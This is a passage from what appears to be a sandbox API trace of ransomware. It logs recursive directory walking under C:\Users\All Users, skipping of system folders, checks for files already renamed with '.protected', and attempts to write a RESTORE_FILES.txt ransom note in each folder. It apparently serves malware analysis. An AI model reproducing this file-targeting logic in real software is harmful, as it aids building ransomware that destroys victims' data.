Help\\MS.WINPROJ.14.1033.hxn.protected") returned 70 [0093.315] StrStrIW (lpFirst="MS.WINPROJ.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.315] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.315] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.protected") returned 74 [0093.315] StrStrIW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.315] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.315] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.315] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.315] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.protected") returned 70 [0093.315] StrStrIW (lpFirst="MS.WINWORD.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.315] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.316] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.316] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.316] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.316] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.316] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.316] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.protected") returned 74 [0093.316] StrStrIW (lpFirst="MS.WINWORD.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.316] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.316] lstrcmpiW (lpString1="nslist.hxl.protected", lpString2="Windows") returned -1 [0093.316] lstrcmpiW (lpString1="nslist.hxl.protected", lpString2="Program Files") returned -1 [0093.316] lstrcmpiW (lpString1="nslist.hxl.protected", lpString2="Program Files (x86)") returned -1 [0093.316] lstrcmpiW (lpString1="nslist.hxl.protected", lpString2="$Recycle.bin") returned 1 [0093.316] lstrcmpiW (lpString1="nslist.hxl.protected", lpString2="System Volume Information") returned -1 [0093.316] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\nslist.hxl.protected") returned 58 [0093.316] StrStrIW (lpFirst="nslist.hxl.protected", lpSrch=".protected") returned=".protected" [0093.316] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.316] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.316] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.316] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.316] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.316] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.316] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\RESTORE_FILES.txt") returned 55 [0093.316] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.316] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.316] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0093.316] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0093.316] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\RESTORE_FILES.txt") returned 55 [0093.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft help\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.316] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.316] lstrcmpiW (lpString1="Mozilla", lpString2="Windows") returned -1 [0093.316] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files") returned -1 [0093.316] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files (x86)") returned -1 [0093.317] lstrcmpiW (lpString1="Mozilla", lpString2="$Recycle.bin") returned 1 [0093.317] lstrcmpiW (lpString1="Mozilla", lpString2="System Volume Information") returned -1 [0093.317] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla") returned 30 [0093.317] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0093.317] lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0093.317] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\*") returned 32 [0093.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0093.317] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.317] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.317] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.317] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.317] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.317] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\.") returned 32 [0093.317] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.317] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.317] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.317] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.317] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.317] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.317] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.317] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\..") returned 33 [0093.317] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.317] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.317] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.317] lstrcmpiW (lpString1="logs", lpString2="Windows") returned -1 [0093.317] lstrcmpiW (lpString1="logs", lpString2="Program Files") returned -1 [0093.317] lstrcmpiW (lpString1="logs", lpString2="Program Files (x86)") returned -1 [0093.317] lstrcmpiW (lpString1="logs", lpString2="$Recycle.bin") returned 1 [0093.317] lstrcmpiW (lpString1="logs", lpString2="System Volume Information") returned -1 [0093.317] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs") returned 35 [0093.317] lstrcmpW (lpString1="logs", lpString2=".") returned 1 [0093.317] lstrcmpW (lpString1="logs", lpString2="..") returned 1 [0093.318] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*") returned 37 [0093.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.318] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.318] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.318] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.318] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.318] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.318] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\.") returned 37 [0093.318] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.318] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.318] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.318] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.318] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.318] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.318] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.318] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\..") returned 38 [0093.318] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.318] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.318] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.318] lstrcmpiW (lpString1="maintenanceservice-install.log.protected", lpString2="Windows") returned -1 [0093.318] lstrcmpiW (lpString1="maintenanceservice-install.log.protected", lpString2="Program Files") returned -1 [0093.318] lstrcmpiW (lpString1="maintenanceservice-install.log.protected", lpString2="Program Files (x86)") returned -1 [0093.318] lstrcmpiW (lpString1="maintenanceservice-install.log.protected", lpString2="$Recycle.bin") returned 1 [0093.318] lstrcmpiW (lpString1="maintenanceservice-install.log.protected", lpString2="System Volume Information") returned -1 [0093.318] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.protected") returned 76 [0093.318] StrStrIW (lpFirst="maintenanceservice-install.log.protected", lpSrch=".protected") returned=".protected" [0093.318] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.318] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.318] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.318] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.318] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.318] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.319] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\RESTORE_FILES.txt") returned 53 [0093.319] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.319] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.319] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.319] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.319] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\RESTORE_FILES.txt") returned 53 [0093.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\mozilla\\logs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.319] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.319] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.319] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.319] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.319] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.319] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.319] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\RESTORE_FILES.txt") returned 48 [0093.319] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.319] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.319] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0093.319] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0093.319] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Mozilla\\RESTORE_FILES.txt") returned 48 [0093.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\mozilla\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.319] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.319] lstrcmpiW (lpString1="Oracle", lpString2="Windows") returned -1 [0093.319] lstrcmpiW (lpString1="Oracle", lpString2="Program Files") returned -1 [0093.319] lstrcmpiW (lpString1="Oracle", lpString2="Program Files (x86)") returned -1 [0093.319] lstrcmpiW (lpString1="Oracle", lpString2="$Recycle.bin") returned 1 [0093.319] lstrcmpiW (lpString1="Oracle", lpString2="System Volume Information") returned -1 [0093.319] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Oracle") returned 29 [0093.319] lstrcmpW (lpString1="Oracle", lpString2=".") returned 1 [0093.319] lstrcmpW (lpString1="Oracle", lpString2="..") returned 1 [0093.319] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Oracle\\*") returned 31 [0093.319] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Oracle\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0093.320] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.320] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.320] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.320] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.320] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.320] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Oracle\\.") returned 31 [0093.320] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.320] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.320] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.320] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.320] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.320] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.320] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.320] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Oracle\\..") returned 32 [0093.320] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.320] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.320] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.320] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.320] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.320] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.320] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.320] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.320] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Oracle\\RESTORE_FILES.txt") returned 47 [0093.320] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.320] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.320] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0093.320] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0093.320] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Oracle\\RESTORE_FILES.txt") returned 47 [0093.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Oracle\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\oracle\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.320] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.320] lstrcmpiW (lpString1="Package Cache", lpString2="Windows") returned -1 [0093.320] lstrcmpiW (lpString1="Package Cache", lpString2="Program Files") returned -1 [0093.320] lstrcmpiW (lpString1="Package Cache", lpString2="Program Files (x86)") returned -1 [0093.320] lstrcmpiW (lpString1="Package Cache", lpString2="$Recycle.bin") returned 1 [0093.321] lstrcmpiW (lpString1="Package Cache", lpString2="System Volume Information") returned -1 [0093.321] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache") returned 36 [0093.321] lstrcmpW (lpString1="Package Cache", lpString2=".") returned 1 [0093.321] lstrcmpW (lpString1="Package Cache", lpString2="..") returned 1 [0093.321] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\*") returned 38 [0093.321] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0093.321] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.321] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.321] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.321] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.321] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\.") returned 38 [0093.321] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.321] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.321] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\..") returned 39 [0093.321] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.321] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.321] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.321] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned 77 [0093.321] lstrcmpW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2=".") returned 1 [0093.321] lstrcmpW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="..") returned 1 [0093.321] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*") returned 79 [0093.321] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.322] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\.") returned 79 [0093.322] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.322] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.322] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\..") returned 80 [0093.322] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.322] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.322] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.322] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned 86 [0093.322] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.322] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.322] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*") returned 88 [0093.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.323] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\.") returned 88 [0093.323] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.323] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.323] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\..") returned 89 [0093.323] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.323] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.323] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.323] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned 92 [0093.323] lstrcmpW (lpString1="Patch", lpString2=".") returned 1 [0093.323] lstrcmpW (lpString1="Patch", lpString2="..") returned 1 [0093.323] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*") returned 94 [0093.323] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.323] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\.") returned 94 [0093.323] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.324] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.324] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\..") returned 95 [0093.324] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.324] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.324] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.324] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RESTORE_FILES.txt") returned 110 [0093.324] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.324] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.324] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.324] lstrcmpiW (lpString1="x64", lpString2="Windows") returned 1 [0093.324] lstrcmpiW (lpString1="x64", lpString2="Program Files") returned 1 [0093.324] lstrcmpiW (lpString1="x64", lpString2="Program Files (x86)") returned 1 [0093.324] lstrcmpiW (lpString1="x64", lpString2="$Recycle.bin") returned 1 [0093.324] lstrcmpiW (lpString1="x64", lpString2="System Volume Information") returned 1 [0093.324] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, 